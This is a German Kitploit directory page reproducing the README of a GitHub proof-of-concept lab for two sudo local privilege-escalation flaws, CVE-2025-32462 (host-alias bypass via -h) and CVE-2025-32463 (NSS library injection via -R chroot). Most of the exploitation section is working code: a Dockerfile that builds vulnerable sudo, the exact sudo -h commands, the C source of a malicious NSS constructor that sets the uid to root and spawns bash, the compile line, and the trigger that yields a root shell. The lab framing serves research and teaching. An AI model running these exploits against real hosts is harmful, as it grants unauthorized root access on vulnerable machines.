Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32462-CVE-2025-32463-PoC-Lab | Kitploit
Tools/GitHubGitHub/yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsLernen & BildungBinary-ExploitationLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
yonathanpy/cve-2025-32462-cve-2025-32463-poc-lab

CVE-2025-32462-CVE-2025-32463-PoC-Lab

Repository anzeigen
21vor 5 MonatenNoch nicht geprüft

CVE-2025-32462 & CVE-2025-32463 – Fortgeschrittenes PoC-Labor

Dieses Repository stellt ein containerbasiertes Labor und einen detaillierten PoC für zwei kritische sudo-Sicherheitslücken bereit:

  • CVE-2025-32462 – Umgehung der Host-Abgleichlogik durch sudo -h
  • CVE-2025-32463 – Escape aus der NSS-Bibliothek mittels sudo -R chroot

Forschung & Danksagung

Originalforschung von Rich Mirch – Stratascale CRU
PoC und Laborumgebung von MAAYTHM


Technischer Überblick

CVE-2025-32462 – Umgehung der Host-Validierungslogik

sudo erzwingt hostbasierte Autorisierung über Host_Alias in /etc/sudoers.
Die Schwachstelle tritt auf, wenn die Option -h angegeben wird: sudo wertet den angegebenen Hostnamen anstelle des kanonischen Hostnamens des Systems aus, wodurch eingeschränkte Benutzer hostbasierte sudo-Richtlinien umgehen können.

Auswirkungen:

  • Umgehung hostbasierter Richtlinien
  • Rechteausweitung
  • Unbefugte Ausführung von Root-Befehlen

CVE-2025-32463 – NSS-Injektion über Chroot

Die Option -R von sudo ermöglicht die Ausführung in einer Chroot-Umgebung. Während der Initialisierung werden NSS-Bibliotheken (Name Service Switch) auf Grundlage von /etc/nsswitch.conf geladen. Durch die Bereitstellung einer bösartigen Chroot-Umgebung und einer benutzerdefinierten NSS-Bibliothek kann ein Angreifer Code als Root ausführen.

Angriffsfläche:

  1. Kontrolliertes Chroot-Dateisystem
  2. Vom Angreifer definierte nsswitch.conf
  3. Benutzerdefinierte NSS-Shared-Library, die dynamisch geladen wird
  4. Konstruktorcode wird mit erhöhten Rechten ausgeführt

Auswirkungen:

  • Rechteausweitung auf Root-Ebene
  • Beliebige Codeausführung im Chroot-Kontext

Laborumgebung

  • Basis-Betriebssystem: Ubuntu 24.04
  • Verwundbare sudo-Version: 1.9.16p2
  • Benutzer: pwn (kein Root)
  • Isolation: Docker-Container mit benutzerdefiniertem Netzwerk

Repository-Struktur

root@kitploit:~
CVE-2025-32462-CVE-2025-32463-PoC-Lab
├── Dockerfile
│   # Builds vulnerable sudo environment
│
├── exploit/
│   ├── cve_2025_32463.c
│   │   # Malicious NSS shared library used for privilege escalation
│   └── build.sh
│       # Compiles the exploit payload into a shared NSS module
│
├── lab/
│   └── setup.sh
│       # Automates vulnerable lab configuration and sudoers setup
│
└── README.md
    # Technical documentation, vulnerability analysis, and PoC usage guide

Vollständige technische Analyse, PoC-Walkthrough und Exploitation-Anleitung


Docker-Laboreinrichtung

root@kitploit:~
FROM ubuntu:24.04

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \
                       pkg-config libssl-dev git nano gcc && \
    rm -rf /var/lib/apt/lists/*

WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \
    tar xzf sudo-1.9.16p2.tar.gz && \
    cd sudo-1.9.16p2 && \
    ./configure --disable-gcrypt --prefix=/usr && \
    make && make install

RUN useradd -m -s /bin/bash pwn && \
    echo 'pwn:pwn' | chpasswd

USER pwn
WORKDIR /home/pwn

CMD ["/bin/bash"]

Labor bauen & ausführen

root@kitploit:~
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d \
  --network sudolabnet \
  --ip 172.190.0.3 \
  --hostname lowpriv.test.local \
  --add-host highpriv.test.local:172.190.0.2 \
  --name lowpriv \
  sudo-vuln-lab tail -f /dev/null

CVE-2025-32462 – Ausnutzung

root@kitploit:~
docker exec -u root -it lowpriv bash
echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers

Normales Verhalten:

root@kitploit:~
sudo id
# Password required

Ausnutzung:

root@kitploit:~
sudo -h highpriv.test.local id
# uid=0(root) gid=0(root) groups=0(root)
sudo -h highpriv.test.local hostname -f
# lowpriv.test.local

CVE-2025-32463 – Ausnutzung

root@kitploit:~
mkdir -p exploitDir/etc
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf
mkdir libnss_
cp /etc/group exploitDir/etc/

Bösartige NSS-Bibliothek:

root@kitploit:~
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void GIVEMEROOT(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}

Kompilieren:

root@kitploit:~
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c

Auslösen:

root@kitploit:~
sudo -R exploitDir <command>
# Root shell obtained
id
# uid=0(root) gid=0(root)
Tool herunterladen